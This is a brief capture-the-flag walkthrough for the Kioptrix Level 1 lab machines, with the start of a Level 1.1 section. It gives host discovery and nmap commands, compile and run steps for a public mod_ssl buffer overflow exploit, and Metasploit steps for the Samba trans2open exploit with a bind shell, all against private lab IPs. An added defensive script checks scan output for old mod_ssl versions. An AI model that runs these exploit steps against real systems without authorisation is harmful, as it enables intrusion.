Kioptrix
Kioptrix Level 1 (#1)
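1. Find the target machine's IP address
nbtscan 192.168.43.0/24 # discovery via the NetBIOS protocol
fping -asg 192.168.43.0/24 # discovery via the ICMP protocol
arp-scan 192.168.43.0/24 # discovery via the ARP protocol
2. Port-scan the target machine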
nmap -sV -p- 192.168.43.54
3.1 SSL vulnerability exploitation
mod_ssl versions below 2.8.7 have a remote buffer overflow vulnerability; look up the exploit and use it
searchsploit "mod_ssl"
cp /usr/share/exploitdb/exploits/unix/remote/47080.c .
gcc -o ssl_exp 47080.c -lcrypto
./ssl_exp 0x6b 192.168.43.54 -c 40 # 0x6b is the value for the matching target system
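Added example, not part of the original walkthrough: a defender-side check that reads `nmap -sV` output such as step 2 produces and flags every open port whose banner reports mod_ssl below the 2.8.7 threshold named above. The scan lines and all function names are constructed for illustration.

```python
import re

# Threshold taken from the walkthrough text: mod_ssl releases below 2.8.7.
MOD_SSL_FIXED = (2, 8, 7)

# Constructed sample of `nmap -sV` service lines (not output from the page).
SAMPLE_SCAN = """\
80/tcp   open  http      Apache httpd 1.3.20 ((Unix) mod_ssl/2.8.4 OpenSSL/0.9.6b)
443/tcp  open  ssl/https Apache/1.3.20 (Unix) mod_ssl/2.8.4 OpenSSL/0.9.6b
8443/tcp open  ssl/https Apache/1.3.41 (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8
22/tcp   open  ssh       OpenSSH 2.9p2 (protocol 1.99)
"""

PORT_RE = re.compile(r"^(\d+)/tcp\s+open\b")
MOD_SSL_RE = re.compile(r"\bmod_ssl/(\d+(?:\.\d+)*)")


def parse_version(text):
    """Turn '2.8.4' into (2, 8, 4), padded to three fields.

    Comparing integer tuples avoids the string-comparison trap where
    '2.8.31' sorts before '2.8.7'.
    """
    parts = [int(p) for p in text.split(".")]
    return tuple(parts + [0] * (3 - len(parts)))


def audit_mod_ssl(scan_text, fixed=MOD_SSL_FIXED):
    """Return [(port, version)] for open ports whose banner shows mod_ssl < fixed."""
    findings = []
    for line in scan_text.splitlines():
        port = PORT_RE.match(line)
        banner = MOD_SSL_RE.search(line)
        if port and banner and parse_version(banner.group(1)) < fixed:
            findings.append((int(port.group(1)), banner.group(1)))
    return findings


if __name__ == "__main__":
    for port, version in audit_mod_ssl(SAMPLE_SCAN):
        print(f"port {port}: mod_ssl {version} is below 2.8.7, upgrade or retire the service")
```

Banner versions can be suppressed or carry distribution backports, so treat a hit as a prompt to verify the installed package rather than as proof.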
3.2 Samba vulnerability exploitation
(1) Find the SMB version with msf
search "samba_version"
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.43.54
exploit
(2) Exploit the vulnerability with msf
search samba 2.2
use exploit/linux/samba/trans2open
set payload linux/x86/shell/bind_tcp
set rhost 192.168.43.54
exploit
Kioptrix Level 1.1 (#2)
1. Find the target machine's IP
2. Port scan
nmap -sV -p- 192.168.43.47